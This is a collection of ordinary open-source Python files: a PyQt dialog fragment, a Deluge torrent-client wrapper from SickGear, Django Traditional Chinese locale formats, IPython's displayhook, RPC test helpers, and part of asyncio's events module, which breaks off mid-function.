item_text = u"Unknown"
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 1, item)
month_str = u""
year_str = u"????"
if match['month'] is not None:
month_str = u"-{0:02d}".format(int(match['month']))
if match['year'] is not None:
year_str = u"{0}".format(match['year'])
item_text = year_str + month_str
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 2, item)
item_text = match['issue_title']
if item_text is None:
item_text = ""
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 3, item)
row += 1
self.twList.resizeColumnsToContents()
self.twList.setSortingEnabled(True)
self.twList.sortItems( 2 , QtCore.Qt.AscendingOrder )
self.twList.selectRow(0)
self.twList.resizeColumnsToContents()
self.twList.horizontalHeader().setStretchLastSection(True)
def cellDoubleClicked( self, r, c ):
self.accept()
def currentItemChanged( self, curr, prev ):
if curr is None:
return
if prev is not None and prev.row() == curr.row():
return
self.altCoverWidget.setIssueID( self.currentMatch()['issue_id'] )
if self.currentMatch()['description'] is None:
self.teDescription.setText ( "" )
else:
self.teDescription.setText ( self.currentMatch()['description'] )
def setCoverImage( self ):
self.archiveCoverWidget.setArchive( self.comic_archive)
def currentMatch( self ):
row = self.twList.currentRow()
match = self.twList.item(row, 0).data( QtCore.Qt.UserRole ).toPyObject()[0]
return match
| gpl-3.0 |
p0psicles/SickGear | sickbeard/clients/deluge.py | 3 | 8261 | # Author: Mr_Orange <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
import json
from base64 import b64encode
import sickbeard
from sickbeard import logger
from sickbeard.clients.generic import GenericClient
from lib.requests.exceptions import RequestException
class DelugeAPI(GenericClient):
def __init__(self, host=None, username=None, password=None):
super(DelugeAPI, self).__init__('Deluge', host, username, password)
self.url = self.host + 'json'
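        # The Deluge Web UI exposes a JSON-RPC endpoint at <host>/json; each
        # call below posts a body of the form
        # {"method": ..., "params": [...], "id": n} and reads the 'result'
        # key of the JSON response.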
def _get_auth(self):
post_data = json.dumps({'method': 'auth.login',
'params': [self.password],
'id': 1})
try:
self.auth = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
post_data = json.dumps({'method': 'web.connected',
'params': [],
'id': 10})
connected = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
if not connected:
post_data = json.dumps({'method': 'web.get_hosts',
'params': [],
'id': 11})
hosts = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
if len(hosts) == 0:
logger.log(self.name + u': WebUI does not contain daemons',
logger.ERROR)
return None
post_data = json.dumps({'method': 'web.connect',
'params': [hosts[0][0]],
'id': 11})
self.session.post(self.url, data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT)
post_data = json.dumps({'method': 'web.connected',
'params': [],
'id': 10})
connected = self.session.post(
self.url,
data=post_data.encode('utf-8'),
verify=sickbeard.TORRENT_VERIFY_CERT
).json()['result']
if not connected:
logger.log(self.name + u': WebUI could not connect to daemon',
logger.ERROR)
return None
except RequestException:
return None
return self.auth
def _add_torrent_uri(self, result):
post_data = json.dumps({
'method': 'core.add_torrent_magnet',
'params': [result.url, {
'move_completed': 'true',
'move_completed_path': sickbeard.TV_DOWNLOAD_DIR
}],
'id': 2
})
result.hash = self._request(method='post',
data=post_data).json()['result']
return result.hash
def _add_torrent_file(self, result):
post_data = json.dumps({'method':
'core.add_torrent_file',
'params': [result.name + '.torrent',
b64encode(result.content),
{'move_completed': 'true',
'move_completed_path':
sickbeard.TV_DOWNLOAD_DIR}],
'id': 2})
result.hash = self._request(method='post',
data=post_data).json()['result']
return result.hash
def _set_torrent_label(self, result):
label = sickbeard.TORRENT_LABEL
if ' ' in label:
logger.log(self.name +
u': Invalid label. Label must not contain a space',
logger.ERROR)
return False
if label:
# check if label already exists and create it if not
post_data = json.dumps({
'method': 'label.get_labels',
'params': [],
'id': 3
})
labels = self._request(method='post',
data=post_data).json()['result']
if labels is not None:
if label not in labels:
logger.log(self.name + ': ' + label +
u' label does not exist in ' +
u'Deluge we must add it',
logger.DEBUG)
post_data = json.dumps({
'method': 'label.add',
'params': [label],
'id': 4
})
self._request(method='post', data=post_data)
logger.log(self.name + ': ' + label +
u' label added to Deluge', logger.DEBUG)
# add label to torrent
post_data = json.dumps({
'method': 'label.set_torrent',
'params': [result.hash, label],
'id': 5
})
self._request(method='post', data=post_data)
logger.log(self.name + ': ' + label +
u' label added to torrent',
logger.DEBUG)
else:
logger.log(self.name + ': ' +
u'label plugin not detected',
logger.DEBUG)
return False
return True
def _set_torrent_ratio(self, result):
ratio = None
if result.ratio:
ratio = result.ratio
if ratio:
post_data = json.dumps({'method': 'core.set_torrent_stop_at_ratio',
'params': [result.hash, True],
'id': 5})
self._request(method='post', data=post_data)
post_data = json.dumps({'method': 'core.set_torrent_stop_ratio',
'params': [result.hash, float(ratio)],
'id': 6})
self._request(method='post', data=post_data)
return True
def _set_torrent_path(self, result):
if sickbeard.TORRENT_PATH:
post_data = json.dumps({
'method': 'core.set_torrent_move_completed',
'params': [result.hash, True],
'id': 7
})
self._request(method='post', data=post_data)
post_data = json.dumps({
'method': 'core.set_torrent_move_completed_path',
'params': [result.hash, sickbeard.TORRENT_PATH],
'id': 8
})
self._request(method='post', data=post_data)
return True
def _set_torrent_pause(self, result):
if sickbeard.TORRENT_PAUSED:
post_data = json.dumps({'method': 'core.pause_torrent',
'params': [[result.hash]],
'id': 9})
self._request(method='post', data=post_data)
return True
api = DelugeAPI()
| gpl-3.0 |
helenst/django | django/conf/locale/zh_Hant/formats.py | 634 | 1810 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'Y年n月j日' # 2016年9月5日
TIME_FORMAT = 'H:i' # 20:45
DATETIME_FORMAT = 'Y年n月j日 H:i' # 2016年9月5日 20:45
YEAR_MONTH_FORMAT = 'Y年n月' # 2016年9月
MONTH_DAY_FORMAT = 'm月j日' # 9月5日
SHORT_DATE_FORMAT = 'Y年n月j日' # 2016年9月5日
SHORT_DATETIME_FORMAT = 'Y年n月j日 H:i' # 2016年9月5日 20:45
FIRST_DAY_OF_WEEK = 1 # 星期一 (Monday)
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%Y/%m/%d', # '2016/09/05'
'%Y-%m-%d', # '2016-09-05'
'%Y年%n月%j日', # '2016年9月5日'
)
TIME_INPUT_FORMATS = (
'%H:%M', # '20:45'
'%H:%M:%S', # '20:45:29'
'%H:%M:%S.%f', # '20:45:29.000200'
)
DATETIME_INPUT_FORMATS = (
'%Y/%m/%d %H:%M', # '2016/09/05 20:45'
'%Y-%m-%d %H:%M', # '2016-09-05 20:45'
    '%Y年%n月%j日 %H:%M', # '2016年9月5日 20:45'
'%Y/%m/%d %H:%M:%S', # '2016/09/05 20:45:29'
'%Y-%m-%d %H:%M:%S', # '2016-09-05 20:45:29'
'%Y年%n月%j日 %H:%M:%S', # '2016年9月5日 20:45:29'
'%Y/%m/%d %H:%M:%S.%f', # '2016/09/05 20:45:29.000200'
'%Y-%m-%d %H:%M:%S.%f', # '2016-09-05 20:45:29.000200'
    '%Y年%n月%j日 %H:%M:%S.%f', # '2016年9月5日 20:45:29.000200'
)
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ''
NUMBER_GROUPING = 4
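# NUMBER_GROUPING = 4 groups digits in blocks of four, matching the
# traditional Chinese numbering units (万 = 10**4, 亿 = 10**8).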
| bsd-3-clause |
omni5cience/django-inlineformfield | .tox/py27/lib/python2.7/site-packages/IPython/core/displayhook.py | 8 | 11365 | # -*- coding: utf-8 -*-
"""Displayhook for IPython.
This defines a callable class that IPython uses for `sys.displayhook`.
Authors:
* Fernando Perez
* Brian Granger
* Robert Kern
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
# Copyright (C) 2001-2007 Fernando Perez <[email protected]>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import sys
from IPython.core.formatters import _safe_get_formatter_method
from IPython.config.configurable import Configurable
from IPython.utils import io
from IPython.utils.py3compat import builtin_mod
from IPython.utils.traitlets import Instance
from IPython.utils.warn import warn
#-----------------------------------------------------------------------------
# Main displayhook class
#-----------------------------------------------------------------------------
# TODO: Move the various attributes (cache_size, [others now moved]). Some
# of these are also attributes of InteractiveShell. They should be on ONE object
# only and the other objects should ask that one object for their values.
class DisplayHook(Configurable):
"""The custom IPython displayhook to replace sys.displayhook.
This class does many things, but the basic idea is that it is a callable
that gets called anytime user code returns a value.
"""
shell = Instance('IPython.core.interactiveshell.InteractiveShellABC')
def __init__(self, shell=None, cache_size=1000, **kwargs):
super(DisplayHook, self).__init__(shell=shell, **kwargs)
cache_size_min = 3
if cache_size <= 0:
self.do_full_cache = 0
cache_size = 0
elif cache_size < cache_size_min:
self.do_full_cache = 0
cache_size = 0
warn('caching was disabled (min value for cache size is %s).' %
cache_size_min,level=3)
else:
self.do_full_cache = 1
self.cache_size = cache_size
# we need a reference to the user-level namespace
self.shell = shell
self._,self.__,self.___ = '','',''
# these are deliberately global:
to_user_ns = {'_':self._,'__':self.__,'___':self.___}
self.shell.user_ns.update(to_user_ns)
@property
def prompt_count(self):
return self.shell.execution_count
#-------------------------------------------------------------------------
# Methods used in __call__. Override these methods to modify the behavior
# of the displayhook.
#-------------------------------------------------------------------------
def check_for_underscore(self):
"""Check if the user has set the '_' variable by hand."""
# If something injected a '_' variable in __builtin__, delete
# ipython's automatic one so we don't clobber that. gettext() in
# particular uses _, so we need to stay away from it.
if '_' in builtin_mod.__dict__:
try:
del self.shell.user_ns['_']
except KeyError:
pass
def quiet(self):
"""Should we silence the display hook because of ';'?"""
# do not print output if input ends in ';'
try:
cell = self.shell.history_manager.input_hist_parsed[self.prompt_count]
return cell.rstrip().endswith(';')
except IndexError:
# some uses of ipshellembed may fail here
return False
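    # Illustrative behavior (sketch): entering "1 + 1" prints "Out[n]: 2",
    # while "1 + 1;" prints nothing because the trailing ';' makes quiet()
    # return True and __call__ skips the display machinery.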
def start_displayhook(self):
"""Start the displayhook, initializing resources."""
pass
def write_output_prompt(self):
"""Write the output prompt.
The default implementation simply writes the prompt to
``io.stdout``.
"""
# Use write, not print which adds an extra space.
io.stdout.write(self.shell.separate_out)
outprompt = self.shell.prompt_manager.render('out')
if self.do_full_cache:
io.stdout.write(outprompt)
def compute_format_data(self, result):
"""Compute format data of the object to be displayed.
The format data is a generalization of the :func:`repr` of an object.
In the default implementation the format data is a :class:`dict` of
        key/value pairs where the keys are valid MIME types and the values
        are JSON'able data structures containing the raw data for that MIME
        type. It is up to frontends to pick a MIME type to use and to
        display that data in an appropriate manner.
This method only computes the format data for the object and should
NOT actually print or write that to a stream.
Parameters
----------
result : object
The Python object passed to the display hook, whose format will be
computed.
Returns
-------
(format_dict, md_dict) : dict
format_dict is a :class:`dict` whose keys are valid MIME types and values are
            JSON'able raw data for that MIME type. It is recommended that
            the return value always include the "text/plain"
            MIME type representation of the object.
md_dict is a :class:`dict` with the same MIME type keys
of metadata associated with each output.
"""
return self.shell.display_formatter.format(result)
def write_format_data(self, format_dict, md_dict=None):
"""Write the format data dict to the frontend.
This default version of this method simply writes the plain text
representation of the object to ``io.stdout``. Subclasses should
override this method to send the entire `format_dict` to the
frontends.
Parameters
----------
format_dict : dict
The format dict for the object passed to `sys.displayhook`.
md_dict : dict (optional)
The metadata dict to be associated with the display data.
"""
# We want to print because we want to always make sure we have a
# newline, even if all the prompt separators are ''. This is the
# standard IPython behavior.
result_repr = format_dict['text/plain']
if '\n' in result_repr:
# So that multi-line strings line up with the left column of
# the screen, instead of having the output prompt mess up
# their first line.
# We use the prompt template instead of the expanded prompt
# because the expansion may add ANSI escapes that will interfere
# with our ability to determine whether or not we should add
# a newline.
prompt_template = self.shell.prompt_manager.out_template
if prompt_template and not prompt_template.endswith('\n'):
# But avoid extraneous empty lines.
result_repr = '\n' + result_repr
print(result_repr, file=io.stdout)
def update_user_ns(self, result):
"""Update user_ns with various things like _, __, _1, etc."""
# Avoid recursive reference when displaying _oh/Out
if result is not self.shell.user_ns['_oh']:
if len(self.shell.user_ns['_oh']) >= self.cache_size and self.do_full_cache:
warn('Output cache limit (currently '+
repr(self.cache_size)+' entries) hit.\n'
'Flushing cache and resetting history counter...\n'
'The only history variables available will be _,__,___ and _1\n'
'with the current result.')
self.flush()
# Don't overwrite '_' and friends if '_' is in __builtin__ (otherwise
# we cause buggy behavior for things like gettext).
if '_' not in builtin_mod.__dict__:
self.___ = self.__
self.__ = self._
self._ = result
self.shell.push({'_':self._,
'__':self.__,
'___':self.___}, interactive=False)
# hackish access to top-level namespace to create _1,_2... dynamically
to_main = {}
if self.do_full_cache:
new_result = '_'+repr(self.prompt_count)
to_main[new_result] = result
self.shell.push(to_main, interactive=False)
self.shell.user_ns['_oh'][self.prompt_count] = result
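    # After this runs for, say, the third result, user_ns exposes it both as
    # _3 and as _, while __ and ___ still point at the two previous results.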
def log_output(self, format_dict):
"""Log the output."""
if self.shell.logger.log_output:
self.shell.logger.log_write(format_dict['text/plain'], 'output')
self.shell.history_manager.output_hist_reprs[self.prompt_count] = \
format_dict['text/plain']
def finish_displayhook(self):
"""Finish up all displayhook activities."""
io.stdout.write(self.shell.separate_out2)
io.stdout.flush()
def __call__(self, result=None):
"""Printing with history cache management.
        This is invoked every time the interpreter needs to print, and is
activated by setting the variable sys.displayhook to it.
"""
self.check_for_underscore()
if result is not None and not self.quiet():
# If _ipython_display_ is defined, use that to display this object.
display_method = _safe_get_formatter_method(result, '_ipython_display_')
if display_method is not None:
try:
return display_method()
except NotImplementedError:
pass
self.start_displayhook()
self.write_output_prompt()
format_dict, md_dict = self.compute_format_data(result)
self.write_format_data(format_dict, md_dict)
self.update_user_ns(result)
self.log_output(format_dict)
self.finish_displayhook()
def flush(self):
if not self.do_full_cache:
raise ValueError("You shouldn't have reached the cache flush "
"if full caching is not enabled!")
# delete auto-generated vars from global namespace
for n in range(1,self.prompt_count + 1):
key = '_'+repr(n)
try:
del self.shell.user_ns[key]
            except KeyError: pass
# In some embedded circumstances, the user_ns doesn't have the
# '_oh' key set up.
oh = self.shell.user_ns.get('_oh', None)
if oh is not None:
oh.clear()
# Release our own references to objects:
self._, self.__, self.___ = '', '', ''
if '_' not in builtin_mod.__dict__:
self.shell.user_ns.update({'_':None,'__':None, '___':None})
import gc
# TODO: Is this really needed?
# IronPython blocks here forever
if sys.platform != "cli":
gc.collect()
| mit |
ntrrgc/snorky | snorky/tests/utils/rpc.py | 1 | 2428 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from snorky.services.base import format_call
from snorky.hashable import make_hashable
class TestRequest(object):
"""Mocked Request class for use with RPC services"""
def __init__(self, service, client, command, params):
self.service = service
self.client = client
self.command = command
self.params = make_hashable(params)
self.debug = True # propagate internal errors
self.call_id = None
self.resolved = False
self.response = None
self.response_type = None
def reply(self, data):
if self.resolved:
raise RuntimeError("This request has already been resolved")
self.response_type = "response"
self.response = data
self.resolved = True
def error(self, msg):
if self.resolved:
raise RuntimeError("This request has already been resolved")
self.response_type = "error"
self.response = msg
self.resolved = True
def format_call(self):
return format_call(self.command, self.params)
class RPCTestMixin(object):
"""Useful methods for testing RPC services"""
def _rpcCallNoAsserts(self, service, client, command, request_debug=True,
**params):
# request_debug=True tells RPCService to propagate internal errors
# instead of replying with an RPC error.
request = TestRequest(service, client, command, params)
request.debug = request_debug
service.process_request(request)
return request
def rpcCall(self, service, client, command, **params):
request = self._rpcCallNoAsserts(service, client, command, **params)
self.assertTrue(request.resolved)
if request.response_type == "error":
raise AssertionError("Error in RPC call: %s" % request.response)
self.assertEqual(request.response_type, "response")
return request.response
def rpcExpectError(self, service, client, command, **params):
request = self._rpcCallNoAsserts(service, client, command, **params)
self.assertTrue(request.resolved)
self.assertEqual(request.response_type, "error")
return request.response
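# A minimal usage sketch of the mixin (CalcService and the client object are
# hypothetical fixtures; any RPC service/client pair works):
#
#     class CalcServiceTest(RPCTestMixin, unittest.TestCase):
#         def setUp(self):
#             self.service = CalcService("calc")
#             self.client = object()
#         def test_sum(self):
#             self.assertEqual(
#                 self.rpcCall(self.service, self.client, "sum", a=1, b=2), 3)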
| mpl-2.0 |
mccheung/kbengine | kbe/src/lib/python/Lib/asyncio/events.py | 61 | 18822 | """Event loop and event loop policy."""
__all__ = ['AbstractEventLoopPolicy',
'AbstractEventLoop', 'AbstractServer',
'Handle', 'TimerHandle',
'get_event_loop_policy', 'set_event_loop_policy',
'get_event_loop', 'set_event_loop', 'new_event_loop',
'get_child_watcher', 'set_child_watcher',
]
import functools
import inspect
import reprlib
import socket
import subprocess
import sys
import threading
import traceback
_PY34 = sys.version_info >= (3, 4)
def _get_function_source(func):
if _PY34:
func = inspect.unwrap(func)
elif hasattr(func, '__wrapped__'):
func = func.__wrapped__
if inspect.isfunction(func):
code = func.__code__
return (code.co_filename, code.co_firstlineno)
if isinstance(func, functools.partial):
return _get_function_source(func.func)
if _PY34 and isinstance(func, functools.partialmethod):
return _get_function_source(func.func)
return None
def _format_args(args):
"""Format function arguments.
Special case for a single parameter: ('hello',) is formatted as ('hello').
"""
# use reprlib to limit the length of the output
args_repr = reprlib.repr(args)
if len(args) == 1 and args_repr.endswith(',)'):
args_repr = args_repr[:-2] + ')'
return args_repr
def _format_callback(func, args, suffix=''):
if isinstance(func, functools.partial):
if args is not None:
suffix = _format_args(args) + suffix
return _format_callback(func.func, func.args, suffix)
func_repr = getattr(func, '__qualname__', None)
if not func_repr:
func_repr = repr(func)
if args is not None:
func_repr += _format_args(args)
if suffix:
func_repr += suffix
source = _get_function_source(func)
if source:
func_repr += ' at %s:%s' % source
return func_repr
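# For example, _format_callback(functools.partial(max, 1), (2,)) returns
# "max(1)(2)": the partial's bound argument renders first, then the call
# arguments, and no "at file:line" suffix is appended because max is a
# builtin with no retrievable source.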
class Handle:
"""Object returned by callback registration methods."""
__slots__ = ('_callback', '_args', '_cancelled', '_loop',
'_source_traceback', '_repr', '__weakref__')
def __init__(self, callback, args, loop):
assert not isinstance(callback, Handle), 'A Handle is not a callback'
self._loop = loop
self._callback = callback
self._args = args
self._cancelled = False
self._repr = None
if self._loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
else:
self._source_traceback = None
def _repr_info(self):
info = [self.__class__.__name__]
if self._cancelled:
info.append('cancelled')
if self._callback is not None:
info.append(_format_callback(self._callback, self._args))
if self._source_traceback:
frame = self._source_traceback[-1]
info.append('created at %s:%s' % (frame[0], frame[1]))
return info
def __repr__(self):
if self._repr is not None:
return self._repr
info = self._repr_info()
return '<%s>' % ' '.join(info)
def cancel(self):
self._cancelled = True
if self._loop.get_debug():
# Keep a representation in debug mode to keep callback and
# parameters. For example, to log the warning "Executing <Handle
            # ...> took 2.5 seconds"
self._repr = repr(self)
self._callback = None
self._args = None
def _run(self):
try:
self._callback(*self._args)
except Exception as exc:
cb = _format_callback(self._callback, self._args)
msg = 'Exception in callback {}'.format(cb)
context = {
'message': msg,
'exception': exc,
'handle': self,
}
if self._source_traceback:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
self = None # Needed to break cycles when an exception occurs.
class TimerHandle(Handle):
"""Object returned by timed callback registration methods."""
__slots__ = ['_when']
def __init__(self, when, callback, args, loop):
assert when is not None
super().__init__(callback, args, loop)
if self._source_traceback:
del self._source_traceback[-1]
self._when = when
def _repr_info(self):
info = super()._repr_info()
pos = 2 if self._cancelled else 1
info.insert(pos, 'when=%s' % self._when)
return info
def __hash__(self):
return hash(self._when)
def __lt__(self, other):
return self._when < other._when
def __le__(self, other):
if self._when < other._when:
return True
return self.__eq__(other)
def __gt__(self, other):
return self._when > other._when
def __ge__(self, other):
if self._when > other._when:
return True
return self.__eq__(other)
def __eq__(self, other):
if isinstance(other, TimerHandle):
return (self._when == other._when and
self._callback == other._callback and
self._args == other._args and
self._cancelled == other._cancelled)
return NotImplemented
def __ne__(self, other):
equal = self.__eq__(other)
return NotImplemented if equal is NotImplemented else not equal
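# The ordering methods above compare TimerHandle instances by their _when
# deadline; this is what lets a concrete event loop keep pending timers in a
# heap, e.g. (sketch): heapq.heappush(scheduled, timer_handle) followed by
# heapq.heappop(scheduled) to retrieve the earliest deadline.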
class AbstractServer:
"""Abstract server returned by create_server()."""
def close(self):
"""Stop serving. This leaves existing connections open."""
return NotImplemented
def wait_closed(self):
"""Coroutine to wait until service is closed."""
return NotImplemented
class AbstractEventLoop:
"""Abstract event loop."""
# Running and stopping the event loop.
def run_forever(self):
"""Run the event loop until stop() is called."""
raise NotImplementedError
def run_until_complete(self, future):
"""Run the event loop until a Future is done.
Return the Future's result, or raise its exception.
"""
raise NotImplementedError
def stop(self):
"""Stop the event loop as soon as reasonable.
Exactly how soon that is may depend on the implementation, but
no more I/O callbacks should be scheduled.
"""
raise NotImplementedError
def is_running(self):
"""Return whether the event loop is currently running."""
raise NotImplementedError
def is_closed(self):
"""Returns True if the event loop was closed."""
raise NotImplementedError
def close(self):
"""Close the loop.
The loop should not be running.
This is idempotent and irreversible.
No other methods should be called after this one.
"""
raise NotImplementedError
# Methods scheduling callbacks. All these return Handles.
def call_soon(self, callback, *args):
return self.call_later(0, callback, *args)
def call_later(self, delay, callback, *args):
raise NotImplementedError
def call_at(self, when, callback, *args):
raise NotImplementedError
def time(self):
raise NotImplementedError
# Method scheduling a coroutine object: create a task.
def create_task(self, coro):
raise NotImplementedError
# Methods for interacting with threads.
def call_soon_threadsafe(self, callback, *args):
raise NotImplementedError
def run_in_executor(self, executor, callback, *args):
raise NotImplementedError
def set_default_executor(self, executor):
raise NotImplementedError
# Network I/O methods returning Futures.
def getaddrinfo(self, host, port, *, family=0, type=0, proto=0, flags=0):
raise NotImplementedError
def getnameinfo(self, sockaddr, flags=0):
raise NotImplementedError
def create_connection(self, protocol_factory, host=None, port=None, *,
ssl=None, family=0, proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None):
raise NotImplementedError
def create_server(self, protocol_factory, host=None, port=None, *,
family=socket.AF_UNSPEC, flags=socket.AI_PASSIVE,
sock=None, backlog=100, ssl=None, reuse_address=None):
"""A coroutine which creates a TCP server bound to host and port.
The return value is a Server object which can be used to stop
the service.
If host is an empty string or None all interfaces are assumed
and a list of multiple sockets will be returned (most likely
one for IPv4 and another one for IPv6).
family can be set to either AF_INET or AF_INET6 to force the
socket to use IPv4 or IPv6. If not set it will be determined
from host (defaults to AF_UNSPEC).
flags is a bitmask for getaddrinfo().
sock can optionally be specified in order to use a preexisting
socket object.
backlog is the maximum number of queued connections passed to
listen() (defaults to 100).
ssl can be set to an SSLContext to enable SSL over the
accepted connections.
reuse_address tells the kernel to reuse a local socket in
TIME_WAIT state, without waiting for its natural timeout to
expire. If not specified will automatically be set to True on
UNIX.
"""
raise NotImplementedError
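    # Typical use against a concrete loop (sketch; MyProtocol is an assumed
    # protocol factory):
    #
    #     server = loop.run_until_complete(
    #         loop.create_server(MyProtocol, host="127.0.0.1", port=8080))
    #     ...
    #     server.close()
    #     loop.run_until_complete(server.wait_closed())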
def create_unix_connection(self, protocol_factory, path, *,
ssl=None, sock=None,
server_hostname=None):
raise NotImplementedError
def create_unix_server(self, protocol_factory, path, *,
sock=None, backlog=100, ssl=None):
"""A coroutine which creates a UNIX Domain Socket server.
The return value is a Server object, which can be used to stop
the service.
        path is a str, representing a file system path to bind the
server socket to.
sock can optionally be specified in order to use a preexisting
socket object.
backlog is the maximum number of queued connections passed to
listen() (defaults to 100).
ssl can be set to an SSLContext to enable SSL over the
accepted connections.
"""
raise NotImplementedError
def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0):
raise NotImplementedError
# Pipes and subprocesses.
def connect_read_pipe(self, protocol_factory, pipe):
"""Register read pipe in event loop. Set the pipe to non-blocking mode.
protocol_factory should instantiate object with Protocol interface.
pipe is a file-like object.
Return pair (transport, protocol), where transport supports the
ReadTransport interface."""
        # The reason to accept a file-like object instead of just a file
        # descriptor is that we need to own the pipe and close it when the
        # transport finishes. We can get complicated errors if we pass
        # f.fileno(), close the fd in the pipe transport, then close f, and
        # vice versa.
raise NotImplementedError
def connect_write_pipe(self, protocol_factory, pipe):
"""Register write pipe in event loop.
protocol_factory should instantiate object with BaseProtocol interface.
Pipe is file-like object already switched to nonblocking.
        Return pair (transport, protocol), where transport supports the
        WriteTransport interface."""
        # The reason to accept a file-like object instead of just a file
        # descriptor is that we need to own the pipe and close it when the
        # transport finishes. We can get complicated errors if we pass
        # f.fileno(), close the fd in the pipe transport, then close f, and
        # vice versa.
raise NotImplementedError
def subprocess_shell(self, protocol_factory, cmd, *, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs):
raise NotImplementedError
def subprocess_exec(self, protocol_factory, *args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs):
raise NotImplementedError
# Ready-based callback registration methods.
# The add_*() methods return None.
# The remove_*() methods return True if something was removed,
# False if there was nothing to delete.
def add_reader(self, fd, callback, *args):
raise NotImplementedError
def remove_reader(self, fd):
raise NotImplementedError
def add_writer(self, fd, callback, *args):
raise NotImplementedError
def remove_writer(self, fd):
raise NotImplementedError
# Completion based I/O methods returning Futures.
def sock_recv(self, sock, nbytes):
raise NotImplementedError
def sock_sendall(self, sock, data):
raise NotImplementedError
def sock_connect(self, sock, address):
raise NotImplementedError
def sock_accept(self, sock):
raise NotImplementedError
# Signal handling.
def add_signal_handler(self, sig, callback, *args):
raise NotImplementedError
def remove_signal_handler(self, sig):
raise NotImplementedError
# Error handlers.
def set_exception_handler(self, handler):
raise NotImplementedError
def default_exception_handler(self, context):
raise NotImplementedError
def call_exception_handler(self, context):
raise NotImplementedError
# Debug flag management.
def get_debug(self):
raise NotImplementedError
def set_debug(self, enabled):
raise NotImplementedError
class AbstractEventLoopPolicy:
"""Abstract policy for accessing the event loop."""
def get_event_loop(self):
"""Get the event loop for the current context.
Returns an event loop object implementing the BaseEventLoop interface,
or raises an exception in case no event loop has been set for the
current context and the current policy does not specify to create one.
It should never return None."""
raise NotImplementedError
def set_event_loop(self, loop):
"""Set the event loop for the current context to loop."""
raise NotImplementedError
def new_event_loop(self):
"""Create and return a new event loop object according to this
policy's rules. If there's need to set this loop as the event loop for
the current context, set_event_loop must be called explicitly."""
raise NotImplementedError
# Child processes handling (Unix only).
def get_child_watcher(self):
"Get the watcher for child processes."
raise NotImplementedError
def set_child_watcher(self, watcher):
"""Set the watcher for child processes."""
raise NotImplementedError
class BaseDefaultEventLoopPolicy(AbstractEventLoopPolicy):
"""Default policy implementation for accessing the event loop.
In this policy, each thread has its own event loop. However, we
only automatically create an event loop by default for the main
thread; other threads by default have no event loop.
Other policies may have different rules (e.g. a single global
event loop, or automatically creating an event loop per thread, or
using some other notion of context to which an event loop is
associated).
"""
_loop_factory = None
class _Local(threading.local):
_loop = None
_set_called = False
def __init__(self):
self._local = self._Local()
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
if (self._local._loop is None and
not self._local._set_called and
isinstance(threading.current_thread(), threading._MainThread)):
self.set_event_loop(self.new_event_loop())
assert self._local._loop is not None, \
('There is no current event loop in thread %r.' %
threading.current_thread().name)
return self._local._loop
def set_event_loop(self, loop):
"""Set the event loop."""
self._local._set_called = True
assert loop is None or isinstance(loop, AbstractEventLoop)
self._local._loop = loop
def new_event_loop(self):
"""Create a new event loop.
You must call set_event_loop() to make this the current event
loop.
"""
return self._loop_factory()
# Event loop policy. The policy itself is always global, even if the
# policy's rules say that there is an event loop per thread (or other
# notion of context). The default policy is installed by the first
# call to get_event_loop_policy().
_event_loop_policy = None
# Lock for protecting the on-the-fly creation of the event loop policy.
_lock = threading.Lock()
def _init_event_loop_policy():
global _event_loop_policy
with _lock:
if _event_loop_policy is None: # pragma: no branch
from . import DefaultEventLoopPolicy
_event_loop_policy = DefaultEventLoopPolicy()
def get_event_loop_policy():
"""Get the current event loop policy."""
if _event_loop_policy is None:
_init_event_loop_policy()
return _event_loop_policy
def set_event_loop_policy(policy):
"""Set the current event loop policy.
If policy is None, the default policy is restored."""
global _event_loop_policy
assert policy is None or isinstance(policy, AbstractEventLoopPolicy)
